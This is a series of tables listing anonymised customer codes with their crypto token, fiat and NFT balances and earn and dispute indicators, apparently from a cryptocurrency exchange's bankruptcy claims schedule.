| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07351702 | | BCH[0], BRZ[1], BTC[0], DOGE[0], ETH[0], LTC[0], TRX[0], USD[0.01], USDT[0] | | |
| 07351703 | | ETHW[7.41810448], SHIB[4], USD[0.00] | Yes | |
| 07351704 | | USD[10.00] | | |
| 07351705 | | USD[0.14] | | |
| 07351707 | | BRZ[1], DOGE[132.97073129], TRX[1], USD[0.00] | | |
| 07351708 | | BTC[.00017067], USD[0.00] | | |
| 07351711 | | USD[10.00] | | |
| 07351712 | | USD[10.00] | | |
| 07351714 | | USD[10.00] | | |
| 07351715 | | NFT (511330185316936600/Coachella x FTX Weekend 2 #12709)[1], USD[10.00] | | |
| 07351716 | | USD[10.00] | | |
| 07351717 | | GRT[51.00973758], SHIB[4145298.04372356], USD[0.00] | Yes | |
| 07351718 | | BRZ[1], CUSDT[1], DOGE[6.17003511], TRX[1], USD[0.00] | Yes | |
| 07351719 | | CUSDT[1], DOGE[.00007931], USD[0.08] | | |
| 07351720 | | USD[10.00] | | |
| 07351721 | | BAT[0], BCH[0], BRZ[0], BTC[0], CUSDT[1], DAI[0], DOGE[2], ETH[0], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07351722 | | DOGE[195.37776097], USD[0.00] | Yes | |
| 07351723 | | BRZ[2.58850875], DAI[0], DOGE[1], USD[0.00] | | |
| 07351724 | | USD[10.00] | | |
| 07351725 | | BRZ[2], CUSDT[5], DOGE[1], TRX[6], USD[0.00] | | |
| 07351726 | | USD[10.00] | | |
| 07351727 | | USD[10.00] | | |
| 07351728 | | BAT[153.5182813], BRZ[230.27036967], CUSDT[9], DOGE[6077.23205155], ETH[.02800059], ETHW[.02765559], GRT[3.1543834], LINK[5.152974], SOL[12.12553665], TRX[915.2311832], USD[0.00], USDT[3.24660733] | Yes | |
| 07351729 | | USD[0.00] | | |
| 07351730 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07351731 | | BAT[1.01655549], BRZ[1], CUSDT[12], TRX[4], USD[0.00] | Yes | |
| 07351733 | | USD[0.00] | | |
| 07351734 | | USD[1.97] | | |
| 07351735 | | USD[10.00] | | |
| 07351736 | | USD[10.00] | | |
| 07351737 | | DOGE[102.05821945], USD[10.50] | | |
| 07351738 | | ETH[.00547139], ETHW[.00547139], USD[0.00] | | |
| 07351739 | | USD[10.00] | | |
| 07351740 | | DOGE[255.47753877], USD[0.29] | | |
| 07351741 | | DOGE[13907.33792571], SHIB[33904704.71736894], USD[0.00], USDT[1.08532654] | Yes | |
| 07351742 | | CUSDT[2], DOGE[15.57543285], GRT[.00026526], USD[0.23] | Yes | |
| 07351744 | | USD[10.00] | | |
| 07351745 | | DOGE[14.80623684], USD[0.00] | | |
| 07351746 | | BRZ[1], CUSDT[2], DOGE[3.00001374], USD[0.00], USDT[0.60277032] | | |
| 07351747 | | DOGE[1123.52267664], USD[10.00] | | |
| 07351748 | | BRZ[1], BTC[0], DOGE[0], SHIB[1], TRX[2], USD[0.01], USDT[0] | Yes | |
| 07351749 | | USD[10.00] | | |
| 07351750 | | USD[10.00] | | |
| 07351751 | | BTC[0.10679159], SOL[200.06682] | | |
| 07351752 | | USD[10.00] | | |
| 07351753 | | USD[10.00] | | |
| 07351754 | | CUSDT[3], DOGE[2.00002123], GRT[1], TRX[2.00297892], USD[0.01] | | |
| 07351756 | | BRZ[1], DOGE[1], TRX[1], USD[155.99] | | |
| 07351757 | | DOGE[136.09525034], USD[0.00] | | |
| 07351758 | | DOGE[65.49920306], USD[0.44] | | |
| 07351759 | | DOGE[0], ETH[0], SHIB[206518.59832635], TRX[0], USD[0.00] | | |
| 07351760 | | BTC[0], CUSDT[2], DOGE[0], MATIC[.14248216], SOL[0], SUSHI[0], USD[0.00] | | |
| 07351761 | | USD[0.01] | | |
| 07351762 | | USD[10.00] | | |
| 07351763 | | CUSDT[2], DOGE[172.84640963], NFT (43327717850108823/Entrance Voucher #2921)[1], USD[0.00] | | |
| 07351764 | | USD[10.00] | | |
| 07351765 | | USD[10.00] | | |
| 07351766 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07351767 | | USD[10.00] | | |
| 07351768 | | USD[10.00] | | |
| 07351770 | | CUSDT[4.95331788], DOGE[16.0807083], USD[0.00] | | |
| 07351771 | | USD[10.00] | | |
| 07351772 | | DOGE[.774], ETH[.000823], ETHW[.000823], SHIB[3100000], USD[4.49] | | |
| 07351773 | | USD[0.13] | | |
| 07351774 | | BAT[0], BCH[0], BRZ[1.00000013], BTC[0], CUSDT[31], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], SOL[0], TRX[4], UNI[0], USD[0.01] | | |
| 07351775 | | BRZ[3], CUSDT[7], DOGE[1], TRX[2], USD[48.97], USDT[0.00165799] | | |
| 07351777 | | USD[10.00] | | |
| 07351778 | | CUSDT[3], USD[0.01], USDT[1] | | |
| 07351780 | | USD[10.00] | | |
| 07351781 | | USD[10.00] | | |
| 07351782 | | SHIB[436296.19929903], TRX[2], USD[0.93] | Yes | |
| 07351783 | | BTC[.00014187], CUSDT[1], DOGE[1737.6407535], ETH[.00364218], ETHW[.00360114], USD[0.00] | Yes | |
| 07351785 | | BTC[0], DOGE[4], GRT[.07643889], TRX[1], USD[0.20], USD[0.00000040] | | |
| 07351786 | | USD[0.00] | | |
| 07351787 | | BRZ[5], CUSDT[8], DOGE[1], TRX[1], USD[0.01] | | |
| 07351789 | | USD[10.00] | | |
| 07351791 | | USD[10.00] | | |
| 07351792 | | USD[10.00] | | |
| 07351793 | | USD[10.00] | | |
| 07351794 | | USD[10.00] | | |
| 07351795 | | USD[0.00], USDT[0] | Yes | |
| 07351796 | | USD[10.00] | | |
| 07351797 | | USD[0.01] | | |
| 07351798 | | USD[10.00] | | |
| 07351799 | | DOGE[2541.97058094], USD[0.00] | Yes | |
| 07351800 | | USD[10.00] | | |
| 07351801 | | BRZ[4], CUSDT[6], TRX[1], USD[0.01], USDT[1] | | |
| 07351803 | | DOGE[146.45274606], USD[0.00] | | |
| 07351804 | | BAT[1], CUSDT[4], DOGE[1727.86585256], KSHIB[2055.29905423], TRX[9.08491765], USD[0.00] | | |
| 07351805 | | CUSDT[2], DOGE[.00002312], USD[0.00] | | |
| 07351806 | | USD[10.00] | | |
| 07351807 | | DOGE[1143.18951496], KSHIB[75.54536756], SHIB[3473375.13000851], USD[0.00] | Yes | |
| 07351809 | | USD[10.00] | | |
| 07351810 | | USD[10.00] | | |
| 07351811 | | USD[0.00] | | |
| 07351812 | | USD[10.00] | | |
| 07351813 | | USD[10.00] | | |
| 07351814 | | USD[10.00] | | |
| 07351815 | | BTC[.00005883], DOGE[334.36517284], USD[10.00] | | |
| 07351816 | | USD[10.00] | | |
| 07351817 | | USD[10.00] | | |
| 07351818 | | USD[10.00] | | |
| 07351819 | | CUSDT[2], DOGE[1], USD[0.00] | | |
| 07351820 | | USD[10.00] | | |
| 07351821 | | USD[10.00] | | |
| 07351822 | | USD[10.00] | | |
| 07351823 | | USD[10.00] | | |
| 07351824 | | BTC[.00041849], DOGE[350.62225613], ETHW[1.76163268], MATIC[17.00498596], SHIB[1168454.80136319], USD[1.00] | | |
| 07351825 | | USD[0.00] | | |
| 07351826 | | USD[10.00] | | |
| 07351827 | | USD[10.00] | | |
| 07351828 | | BTC[0.00000023], ETH[0.30085355], MATIC[0], NFT [559533672034579377/Entrance Voucher #2765][1], SHIB[1], USD[0.00] | Yes | |
| 07351830 | | USD[10.00] | | |
| 07351831 | | DOGE[1], USD[0.01] | | |
| 07351832 | | USD[3.02] | | |
| 07351833 | | BAT[1.78576933], BRZ[1], CUSDT[2], SOL[3.73769445], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07351835 | | USD[0.00] | | |
| 07351836 | | USD[10.00] | | |
| 07351837 | | BTC[.00123119], CUSDT[7], DOGE[682.17747228], ETH[.00281603], ETHW[.00281603], TRX[104.55604875], USD[0.00], USDT[1] | | |
| 07351838 | | USD[10.00] | | |
| 07351839 | | USD[10.00] | | |
| 07351840 | | USD[10.00] | | |
| 07351841 | | USD[10.00] | | |
| 07351842 | | BAT[4.44225183], BRZ[5.07952967], CUSDT[20], DOGE[1], LINK[1.11056299], TRX[13.52028526], USD[0.03], USDT[3.33168887] | Yes | |
| 07351843 | | DOGE[1.09557764], SHIB[1], USD[0.59] | | |
| 07351844 | | CUSDT[8], DOGE[719.37969466], ETH[.0000902], ETHW[.0000902], TRX[2], USD[0.01] | Yes | |
| 07351845 | | USD[10.00] | | |
| 07351846 | | USD[10.00] | | |
| 07351847 | | DOGE[6033.66940381], USD[0.00] | | |
| 07351848 | | USD[10.00] | | |
| 07351849 | | USD[10.00] | | |
| 07351850 | | USD[10.00] | | |
| 07351851 | | BAT[.00055736], BCH[.00036468], CUSDT[1.00068879], DOGE[2.85388487], GRT[.00553582], LINK[.00002369], LTC[.00000705], PAXG[.0000729], SUSHI[.00001532], TRX[1.00004433], UNI[.00036248], USDT[0.00055978] | | |
| 07351853 | | USD[0.01] | | |
| 07351854 | | BTC[0], DOGE[91.31733082], USD[10.00] | | |
| 07351855 | | DOGE[140.93016445], USD[0.00] | | |
| 07351857 | | USD[0.00] | | |
| 07351858 | | NFT (290947411339813946/GSW Western Conference Semifinals Commemorative Ticket #837)[1], NFT (298793842273992079/Warriors Foam Finger #545 (Redeemed))[1], NFT (326133485585090835/GSW Championship Commemorative Ring)[1], NFT (343595878695639514/GSW Western Conference Finals Commemorative Banner #1640)[1], NFT (361115040006971587/GSW Western Conference Finals Commemorative Banner #1639)[1], NFT (498157762821390967/GSW Round 1 Commemorative Ticket #593)[1], SOL[.48], USD[0.00] | | |
| 07351859 | | USD[10.00] | | |
| 07351860 | | BRZ[1], DOGE[2.16200206], ETH[.00998844], ETHW[8.51998844], USD[19496.58], USDT[0.07677468] | | |
| 07351862 | | USD[10.00] | | |
| 07351863 | | DOGE[1.26661233], TRX[1], USD[0.00] | | |
| 07351864 | | BAT[1], BRZ[3], CUSDT[1], USD[0.00] | | |
| 07351865 | | CUSDT[3], DOGE[1], TRX[1], USD[0.01], USDT[1] | | |
| 07351866 | | USD[10.00] | | |
| 07351867 | | USD[10.00] | | |
| 07351868 | | BRZ[0], BTC[0], CUSDT[1], DOGE[367.29465779], GRT[0], NFT (508220247102859938/Imola Ticket Stub #659)[1], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07351869 | | SHIB[1], TRX[1], USD[0.01] | Yes | |
| 07351870 | | USD[10.00] | | |
| 07351871 | | BAT[85.61473855], BTC[0.00043854], CUSDT[1], DOGE[919.09953355], ETH[.02494785], ETHW[.0246334], LINK[1.05168014], LTC[.20560057], SUSHI[1.99216705], TRX[231.50645764], UNI[1.05375439], USD[0.00] | Yes | |
| 07351872 | | USD[10.00] | | |
| 07351873 | | DOGE[.00001825], USD[0.05] | | |
| 07351875 | | BRZ[1], CUSDT[1], DOGE[6], SOL[0], SUSHI[0], USD[0.00] | | |
| 07351876 | | BRZ[1], BTC[0], CUSDT[3], DOGE[0], GRT[0], TRX[2], USD[0.00] | | |
| 07351877 | | USD[10.00] | | |
| 07351878 | | BRZ[1], CUSDT[2], USD[0.00] | | |
| 07351879 | | USD[10.00] | | |
| 07351881 | | USD[10.00] | | |
| 07351882 | | USD[10.00] | | |
| 07351883 | | CUSDT[1], TRX[2], USD[0.00] | | |
| 07351885 | | USD[10.00] | | |
| 07351886 | | USD[10.00] | | |
| 07351887 | Contingent, Disputed | DOGE[2157.48558579], TRX[2], USD[0.00] | | |
| 07351888 | | USD[0.00], USDT[0] | | |
| 07351889 | | CUSDT[1], DOGE[1], USD[0.00] | Yes | |
| 07351890 | | BTC[.00001662], USD[0.00] | | |
| 07351891 | | USD[10.00] | | |
| 07351892 | | USD[0.01] | | |
| 07351893 | | DOGE[5786.09163797], USD[0.02] | | |
| 07351894 | | USD[10.00] | | |
| 07351895 | | USD[0.01] | | |
| 07351896 | | BRZ[1], CUSDT[4], DOGE[209.56227525], TRX[3], USD[0.26] | Yes | |
| 07351897 | | BRZ[1], CUSDT[1], DOGE[203.93311361], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07351899 | | USD[0.00] | | |
| 07351900 | | BTC[.00253372], DOGE[0], ETHW[.0349025], USD[0.00] | Yes | |
| 07351902 | | AAVE[.00503], BTC[0.00003507], DOGE[.601], ETH[.00097011], ETHW[.00097011], LINK[.0291], MATIC[1.736], SOL[.006481], USD[30.40], USDT[0], YFI[.0001826] | | |
| 07351903 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07351904 | | USD[10.00] | | |
| 07351905 | | BAT[1], CUSDT[4], DOGE[2570.11609212], TRX[1], USD[0.00] | | |
| 07351906 | | USD[10.00] | | |
| 07351907 | | USD[10.00] | | |
| 07351908 | | USD[10.00] | | |
| 07351909 | | BRZ[1], CUSDT[3], TRX[5], USD[0.01] | | |
| 07351910 | | USD[10.00] | | |
| 07351911 | | USD[10.00] | | |
| 07351913 | | USD[10.00] | | |
| 07351914 | | BTC[.00019988], USD[0.00] | Yes | |
| 07351915 | | BTC[0], DOGE[0], ETH[0], ETHW[0], LTC[0], USD[0.00] | Yes | |
| 07351916 | | USD[0.15] | | |
| 07351917 | | USD[10.00] | | |
| 07351918 | | USD[10.00] | | |
| 07351919 | | BRZ[0], DOGE[45.79666271], ETH[0], GRT[0], USD[0.01] | | |
| 07351920 | | USD[10.00] | | |
| 07351921 | | BTC[0], CUSDT[3], DOGE[0], USD[0.00] | | |
| 07351922 | | CUSDT[12], TRX[4], USD[0.00] | Yes | |
| 07351923 | | USD[10.00] | | |
| 07351924 | | ETH[.0040546], ETHW[.0040546], USD[0.00] | | |
| 07351925 | | USD[8.00] | | |
| 07351926 | | DOGE[130.27066988], TRX[1], USD[0.00] | | |
| 07351927 | | ALGO[132.79902719], BAT[61.88506626], BCH[.0000003], BRZ[2], CUSDT[26], DOGE[187.42294459], GRT[17.74248143], LINK[3.42059392], NFT (501479999319756077/Happy Halloween #2)[1], NFT (558058174168577062/Get your kicks )[1], SHIB[1937896.65418935], SOL[10.90803098], SUSHI[198.28379189], TRX[2088.75253899], UNI[13.26499706], USD[0.00] | Yes | |
| 07351928 | | DOGE[395.37815838], SHIB[2737971.9567306], SOL[0], USD[0.01], USDT[0] | Yes | |
| 07351929 | | BRZ[1], DOGE[2267.30103648], USD[0.00] | | |
| 07351930 | | SHIB[132890.3654485], USD[0.00] | | |
| 07351931 | | USD[11.06] | Yes | |
| 07351932 | | USD[10.00] | | |
| 07351933 | | DOGE[1.7347017], TRX[1], USD[0.01] | | |
| 07351934 | | DOGE[190.35711756], USD[0.00] | | |
| 07351935 | | USD[10.00] | | |
| 07351936 | | USD[10.00] | | |
| 07351937 | | USD[10.00] | | |
| 07351938 | | TRX[1], USD[0.00] | | |
| 07351939 | | USD[10.00] | | |
| 07351940 | | USD[10.00] | | |
| 07351941 | | USD[10.00] | | |
| 07351942 | | BRZ[2], CUSDT[1], DOGE[506.36425968], USD[0.00] | | |
| 07351943 | | USD[10.00] | | |
| 07351944 | | USD[10.00] | | |
| 07351945 | | USD[10.00] | | |
| 07351946 | | USD[10.00] | | |
| 07351947 | | USD[10.00] | | |
| 07351948 | | USD[10.00] | | |
| 07351949 | | DOGE[628.13522570], SHIB[4848901.36463636], USD[0.00], USDT[0] | Yes | |
| 07351950 | | USD[10.00] | | |
| 07351951 | | BAT[0], BRZ[0], CUSDT[15], DOGE[0], GRT[0], SOL[0], SUSHI[0], TRX[0], USD[3.67] | Yes | |
| 07351952 | | BTC[.00020015], CUSDT[1], DOGE[1], USD[0.00] | | |
| 07351953 | | USD[10.00] | | |
| 07351954 | | CUSDT[9], DOGE[1], TRX[.01080598], USD[0.00] | Yes | |
| 07351955 | Contingent, Disputed | USD[10.00] | | |
| 07351957 | | USD[10.00] | | |
| 07351958 | | USD[10.00] | | |
| 07351959 | | TRX[1], USD[0.00] | | |

| Customer Code | Contingent, or Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07351960 | | USD[10.00] | | |
| 07351962 | | DOGE[20.84660784], USD[0.00] | | |
| 07351963 | | CUSDT[1], DOGE[1.98628762], USD[0.00] | | |
| 07351964 | | CUSDT[6], DOGE[1], USD[0.00] | | |
| 07351965 | | USD[10.00] | | |
| 07351966 | | DOGE[151.11618189], USD[0.00] | | |
| 07351967 | | DOGE[3447.9042319], USD[10.00] | | |
| 07351968 | | DOGE[64.02595316], USD[10.80] | | |
| 07351969 | | USD[10.00] | | |
| 07351970 | | USD[10.00] | | |
| 07351971 | | USD[10.00] | | |
| 07351972 | | CUSDT[1], DOGE[1], TRX[1], USD[2106.81], USDT[1] | | |
| 07351973 | | BTC[0], DOGE[0], SOL[0], USD[0.00] | Yes | |
| 07351974 | | DOGE[936.76482316], USD[0.00] | | |
| 07351975 | | DOGE[1117.94164933], TRX[1], USD[0.00] | | |
| 07351976 | | BRZ[0], CUSDT[1], DOGE[0], SHIB[4636.21506008], USD[10.69] | Yes | |
| 07351977 | | USD[0.00] | | |
| 07351979 | | BRZ[1], CUSDT[8], DOGE[1.3923466], TRX[1], USD[17.95] | | |
| 07351980 | | USD[10.00] | | |
| 07351981 | | USD[10.00] | | |
| 07351982 | | USD[10.00] | | |
| 07351983 | | USD[10.00] | | |
| 07351984 | | BAT[8.57547899], BRZ[37.52341394], CUSDT[2], DOGE[32.23718787], ETH[.01902972], ETHW[.01902972], SUSHI[.8991691], TRX[258.59442894], UNI[.27568213], USD[0.00], USDT[9.93811417] | | |
| 07351985 | | CUSDT[1], DOGE[3], TRX[1], USD[35.09] | | |
| 07351986 | | BTC[.00021602], USD[0.00] | Yes | |
| 07351987 | | USD[10.00] | | |
| 07351988 | | USD[10.00] | | |
| 07351989 | | USD[10.00] | | |
| 07351990 | | SHIB[1], USD[0.00] | Yes | |
| 07351991 | | USD[10.00] | | |
| 07351992 | | USD[10.00] | | |
| 07351993 | | USD[10.00] | | |
| 07351994 | | DOGE[0], USD[0.00] | | |
| 07351995 | | USD[10.00] | | |
| 07351996 | | SHIB[13432.33267298], USD[0.00] | Yes | |
| 07351997 | | USD[10.00] | | |
| 07351998 | | DOGE[231.89067189], USD[10.00] | | |
| 07351999 | | SHIB[323242.9628479], USD[0.00] | Yes | |
| 07352000 | | USD[10.00] | | |
| 07352004 | | USD[10.00] | | |
| 07352005 | | USD[10.00] | | |
| 07352006 | | DOGE[636.73227705], LTC[0], USD[0.00] | | |
| 07352008 | | DOGE[28.87434853], USD[0.00] | | |
| 07352009 | | CUSDT[5], TRX[2], USD[0.01] | | |
| 07352012 | | USD[10.00] | | |
| 07352014 | | USD[10.00] | | |
| 07352015 | | USD[0.01] | | |
| 07352016 | | DOGE[2332.59147905], USD[10.00] | | |
| 07352017 | | BRZ[.54944934], DOGE[2.00003614], GRT[.01338074], TRX[2], USD[0.00] | Yes | |
| 07352018 | | DOGE[16616.95854344], USD[0.04], USDT[0.00000001] | | |
| 07352019 | | USD[10.00] | | |
| 07352020 | | BTC[.00012753], SOL[.05251143], TRX[113.65925082], USD[0.00] | | |
| 07352021 | | CUSDT[1], DOGE[0], USD[0.44] | | |
| 07352023 | | BAT[1], BRZ[3], CUSDT[4], TRX[3], USD[0.00] | | |
| 07352024 | | ALGO[73.4471727], BRZ[1], BTC[.00118298], CUSDT[3], DOGE[4], SHIB[2], SOL[6.48296898], TRX[1], USD[0.00], YFI[.00905958] | Yes | |
| 07352025 | | BTC[0], DAI[.0450193], ETH[.01], ETHW[.01], USDT[2.13632704] | | |
| 07352026 | | BRZ[1], CUSDT[1], TRX[1], USD[0.00] | Yes | |
| 07352027 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07352028 | | USD[10.97] | | |
| 07352029 | | BRZ[2], CUSDT[7], GRT[.01863836], LINK[11.67545478], MATIC[131.18147208], SHIB[.00000004], TRX[1556.3206613], USD[0.01] | Yes | |
| 07352030 | | USD[0.01] | | |
| 07352031 | | USD[10.00] | | |
| 07352032 | | USD[10.00] | | |
| 07352033 | | USD[10.00] | | |
| 07352034 | | CUSDT[2], DOGE[0.29663982], USD[0.01] | Yes | |
| 07352036 | | CUSDT[4], TRX[1], USD[0.85] | | |
| 07352037 | | USD[0.00] | | |
| 07352038 | | CUSDT[1], DOGE[1626.87510862], SHIB[758901.12542738], TRX[4], USD[0.01] | Yes | |
| 07352040 | | USD[10.00] | | |
| 07352041 | | BRZ[0], BTC[0], CUSDT[1], DOGE[144.78772885], GRT[0], SOL[0], SUSHI[0], UNI[0], USD[0.00], USDT[0] | Yes | |
| 07352042 | | USD[10.00] | | |
| 07352043 | | CUSDT[1], USD[0.00] | | |
| 07352044 | | USD[10.00] | | |
| 07352045 | | BAT[0], BCH[0], BRZ[23.16770767], BTC[0], CUSDT[54.05798435], DOGE[0], ETH[0], GRT[2.06184049], LINK[0], MATIC[0], NFT (33407479277382480304Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #29)[1], NFT (53069505466232873804Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #30)[1], SUSHI[0], TRX[1], USD[0.00], USDT[11.02681453] | Yes | |
| 07352046 | | ALGO[822.83121593], BRZ[4], CUSDT[74.18291284], DOGE[11899.04209601], ETH[.05650741], ETHW[.05580753], KSHIB[902.83078488], SHIB[6675226.60644327], TRX[6], USD[0.00] | Yes | |
| 07352047 | | DOGE[0], ETH[0], SHIB[1], USD[0.01] | | |
| 07352048 | | USD[10.00] | | |
| 07352049 | | CUSDT[2], SHIB[1], USD[0.01] | Yes | |
| 07352050 | | USD[10.00] | | |
| 07352051 | | DOGE[1.00004124], ETH[.00758751], ETHW[.00758751], USD[0.01] | | |
| 07352052 | | BRZ[4], CUSDT[3], DOGE[1], GRT[1], TRX[3.00001853], USD[0.00], USDT[0] | | |
| 07352053 | | USD[10.00] | | |
| 07352054 | | USD[10.00] | | |
| 07352055 | | BAT[2], CUSDT[1], TRX[2], USD[0.00], USDT[0] | | |
| 07352056 | | USD[10.00] | | |
| 07352057 | | USD[10.00] | | |
| 07352058 | | BF_POINT[100], BRZ[0.00085579], BTC[.00115269], CUSDT[3], DOGE[865.45977991], TRX[1], USD[0.01] | | |
| 07352059 | | BRZ[1], DOGE[305.09008768], USD[0.00] | | |
| 07352060 | | DOGE[0], EUR[0.00], USD[0.01] | Yes | |
| 07352061 | | BRZ[1], CUSDT[3], DOGE[1], TRX[1], USD[0.01], USDT[2] | | |
| 07352062 | | USD[10.00] | | |
| 07352064 | | USD[10.00] | | |
| 07352065 | | DOGE[172.90382639], USD[0.00] | | |
| 07352066 | | USD[0.00] | | |
| 07352067 | | USD[10.00] | | |
| 07352068 | | BTC[0], DOGE[4], ETH[0], ETHW[0], USD[0.00] | | |
| 07352069 | | BAT[1], CUSDT[1], TRX[2], UNI[.00000961], USD[0.00], USDT[0] | | |
| 07352071 | | BRZ[0], BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.03] | | |
| 07352072 | | USD[10.00] | | |
| 07352073 | | BRZ[1], CUSDT[.43350498], DOGE[2228.72185336], TRX[84.63542467], USD[0.00] | | |
| 07352074 | | DOGE[141.06059511], USD[0.00] | | |
| 07352075 | | BTC[0], DOGE[.04870776], USD[0.00] | | |
| 07352076 | | USD[10.00] | | |
| 07352077 | | USD[10.00] | | |
| 07352078 | | USD[10.00] | | |
| 07352079 | | BRZ[1], CUSDT[2], DOGE[0], USD[0.00] | | |
| 07352080 | | USD[10.00] | | |
| 07352082 | | USD[10.00] | | |
| 07352083 | | CUSDT[2], DOGE[65.95426347], USD[0.00] | | |
| 07352084 | | USD[10.00] | | |
| 07352085 | | USD[10.00] | | |
| 07352086 | | CUSDT[8], DOGE[0], ETH[0], LINK[0], TRX[1], UNI[0], USD[0.00] | | |
| 07352087 | | CUSDT[1], ETH[.00000025], ETHW[.00000025], USD[7.33] | | |
| 07352088 | | CUSDT[1], USD[0.00] | | |
| 07352089 | | CUSDT[2], DOGE[1], USD[0.00] | | |
| 07352091 | | DOGE[57.30417987], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07352092 | | CUSDT[4], DOGE[0], USD[0.00] | | |
| 07352093 | | DOGE[20.89013976], USD[0.00] | | |
| 07352094 | | USD[10.00] | | |
| 07352095 | | USD[10.00] | | |
| 07352096 | | DOGE[104.70145114], ETH[.00319081], ETHW[.00319081], USD[0.00] | | |
| 07352097 | | DOGE[1.53981319], USD[0.00], USDT[0] | | |
| 07352098 | | USD[10.00] | | |
| 07352099 | | CUSDT[1], DOGE[78.95088696], TRX[1], USD[0.00] | | |
| 07352100 | | CUSDT[2], DOGE[236.4866165], SHIB[276.34208552], USD[0.00] | Yes | |
| 07352101 | | CUSDT[1], USD[51.23] | Yes | |
| 07352102 | | USD[10.00] | | |
| 07352103 | | DOGE[.3], MATIC[5], USD[0.92] | | |
| 07352106 | | BRZ[1], CUSDT[6], DOGE[.53883774], ETH[.01224366], ETHW[.01209307], SHIB[3], TRX[2.17072643], USD[0.22] | Yes | |
| 07352107 | | BRZ[2], CUSDT[1], DOGE[16.70193945], TRX[2], USD[0.00] | | |
| 07352109 | | USD[10.00] | | |
| 07352110 | | DOGE[3], GRT[4.1479073], USD[0.00] | | |
| 07352111 | | USD[10.00] | | |
| 07352112 | | CUSDT[5], DOGE[276.18970072], ETH[.02970284], ETHW[.02970284], USD[0.02] | | |
| 07352113 | | USD[10.00] | | |
| 07352114 | | USD[10.00] | | |
| 07352116 | | USD[10.00] | | |
| 07352117 | | USD[10.00] | | |
| 07352118 | | CUSDT[1], USD[0.01] | | |
| 07352119 | | USD[11.28] | | |
| 07352122 | | USD[10.00] | | |
| 07352123 | | BTC[0], DOGE[1], ETH[0], USD[0.00] | | |
| 07352124 | | USD[10.00] | | |
| 07352125 | | TRX[1], USD[0.01], USDT[1] | | |
| 07352126 | | USD[10.00] | | |
| 07352127 | | USD[10.00] | | |
| 07352128 | | USD[10.00] | | |
| 07352129 | | BAT[1], CUSDT[1], USD[0.01] | | |
| 07352130 | | DOGE[1], GRT[4.17233372], USD[0.00] | | |
| 07352132 | | CUSDT[1], DOGE[1400.37405589], USD[10.00] | | |
| 07352133 | | BRZ[3], CUSDT[1], DOGE[.00485562], GRT[1.00307323], SOL[9.65105462], TRX[1], USD[0.00] | Yes | |
| 07352134 | | USD[10.00] | | |
| 07352135 | | BTC[0], DOGE[0], SUSHI[0], TRX[0], USD[0.00] | | |
| 07352136 | | SHIB[20249.38761512], USD[0.00] | | |
| 07352137 | | ETH[.00004922], ETHW[.00004922], USD[0.00] | | |
| 07352138 | | CUSDT[1], DOGE[2230.60115158], TRX[1], USD[2.79] | | |
| 07352139 | | USD[10.00] | | |
| 07352140 | | USD[10.00] | | |
| 07352141 | | USD[10.00] | | |
| 07352142 | | USD[0.00] | | |
| 07352144 | | USD[10.00] | | |
| 07352145 | | SOL[0], USD[0.00] | | |
| 07352146 | | USD[10.00] | | |
| 07352148 | | BAT[2], BRZ[2], CUSDT[3], TRX[1], USD[0.00], USDT[1] | | |
| 07352149 | | CUSDT[2], DOGE[2373.45721085], TRX[2], USD[0.00], USDT[1] | | |
| 07352150 | | CUSDT[1], DOGE[226.99076773], USD[0.00] | | |
| 07352151 | | USD[10.00] | | |
| 07352152 | | DOGE[137.69082571], USD[0.00] | | |
| 07352153 | | USD[10.00] | | |
| 07352154 | | DOGE[120.53277479], USD[14.01] | | |
| 07352155 | | USD[10.00] | | |
| 07352156 | | USD[10.00] | | |
| 07352158 | | BTC[0], CUSDT[4], DOGE[502.0212071], USD[0.00] | | |
| 07352159 | | TRX[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07352160 | | BRZ[1], CUSDT[2], DOGE[2012.07814427], ETH[0], GRT[1], SOL[3.34182516], USD[0.00] | | |
| 07352161 | | USD[0.00], YFI[.00023679] | | |
| 07352163 | | CUSDT[2], DOGE[494.49941805], USD[0.01] | | |
| 07352164 | | USD[10.00] | | |
| 07352165 | | USD[10.00] | | |
| 07352166 | | DOGE[930.28890499], USD[1.00] | | |
